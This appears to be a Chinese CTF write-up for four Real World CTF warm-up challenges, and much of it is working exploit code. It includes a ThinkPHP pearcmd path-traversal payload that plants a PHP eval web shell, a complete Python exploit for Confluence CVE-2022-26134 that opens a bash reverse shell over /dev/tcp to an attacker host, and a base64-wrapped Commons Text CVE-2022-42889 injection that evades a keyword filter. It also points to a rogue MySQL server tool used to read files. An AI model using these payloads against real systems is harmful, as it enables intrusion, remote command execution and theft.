【Realworld体验赛】--Writeup

发表于 分类于 本文字数: 4.6k 阅读时长 ≈ 4 分钟

Realworld-CTF太人性化了,知道国际赛不是谁都能解题的,直接上了一个体验赛(ps:40%正赛难度)让我这种fw也有能玩的地方了,QEQ。没环境复现了,就贴一下比赛写的不是很详细的wp。 :(

Be-a-Language-Expert

解题过程

原本的poc打的是/var/www/html/这个路径,这里打不了,直接打/tmp/

POC

1
?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/%/<?=@eval($_REQUEST['TW']);?>+/tmp/TWe1v3.php

设置Cookie

1
Cookie: think_lang=zh-cn../../../../../../../../usr/local/lib/php/pearcmd

1

蚁剑直接连:http://ip:port/index?lang=…/…/…/…/…/…/…/…/…/…/tmp/TWe1v3

shell:TW

2

连上直接./readflag

Be-a-Wiki-Hacker

解题过程

CVE-2022-26134直接github上搜exp

找到弹shell的exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#!/usr/bin/python3
# coding: utf-8
# cve2022-26134
# by: lxxl
import urllib
import requests
import re
import sys
from bs4 import BeautifulSoup
import urllib3

urllib3.disable_warnings()
import argparse



def check(url):
    r = requests.get(url + "/login.action", verify=False)
    if (r.status_code == 200):
        filter_version = re.findall("<span id='footer-build-information'>.*</span>", r.text)
        if (len(filter_version) >= 1):
            version = filter_version[0].split("'>")[1].split('</')[0]
            return version
        else:
            return False
    else:
        return url


def exploit(url, command):
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': '*/*',
    }
    r = requests.get(
        url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22' + command + '%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/',
        headers=headers, verify=False, allow_redirects=False)
    if (r.status_code == 302):
        return r.headers['X-Cmd-Response']
    else:
        return False

def shell():
        shell = ip + "/" + port
        shell1 = "'bash','-c','bash -i >& "
        exp = shell1 + "/dev/tcp/"  + shell + " 0>&1'"
        payload1 = '''${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('''
        payload2 = exp + ''').start()")}/'''
        payloads = payload1 + payload2
        s = urllib.parse.quote(payloads)
        return s


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='cve2022-26134')
    parser.add_argument('-u', '--url', help='target url', required=False)
    parser.add_argument('-c', '--command', help='command', required=False)
    parser.add_argument('-i', '--lhost', help='type', required=False)
    parser.add_argument('-p', '--lport', help='type', required=False)
    args = parser.parse_args()
    cmd = args.command
    ip = args.lhost
    port = args.lport

    if (len(sys.argv) < 3):
        print("USE: python3 " + sys.argv[0] + " -u https://target.com -c command")
        print("ex: python3 " + sys.argv[0] + " -u https://target.com -i  your.ip -p your.port")

    if (sys.argv[3] == "-i"):
            target = args.url
            ip = args.lhost
            port = args.lport
            e = requests.get(target + shell(), verify=False)
            if e.status_code == 200 or e.status_code == 302:
                    print("[+] exploit success")
            else:
                    print("[-] exploit failed")

    else:
        target = args.url
        cmd = cmd.replace("'", "")
        version = check(target)
        print("============ GET Confluence Version ============")
        if (version):
            print("Version: " + version)
        else:
            print("Version: Not Found")
        print(exploit(target, cmd))



3

自己本机或者服务器 nc -l xxxx 监听一下,远程弹个shell

Cat /f*

4

ApacheCommandText

解题过程

CVE-2022-42889

java表达式注入漏洞

一开始直接用CVE的POC是不可以的,ban了[script, file, url, dns]

利用base64Decoder绕过限制

利用RCE读取找flag的路径为/readflag

1
2
String poc = "${script:js:new java.util.Scanner(new java.lang.ProcessBuilder('/bin/sh','-c', '/readflag').start().getInputStream(), 'GBK').useDelimiter('zzc').next()}";
String exp = "${base64Decoder:" + Base64.getEncoder().encodeToString(poc.getBytes()) + "}";
1
${base64Decoder:JHtzY3JpcHQ6anM6bmV3IGphdmEudXRpbC5TY2FubmVyKG5ldyBqYXZhLmxhbmcuUHJvY2Vzc0J1aWxkZXIoJy9iaW4vc2gnLCctYycsICcvcmVhZGZsYWcnKS5zdGFydCgpLmdldElucHV0U3RyZWFtKCksICdHQksnKS51c2VEZWxpbWl0ZXIoJ3p6YycpLm5leHQoKX0=}

Evil MySQL Server

解题过程

利用恶意 mysql 服务端来读取文件

https://github.com/Gifts/Rogue-MySql-Server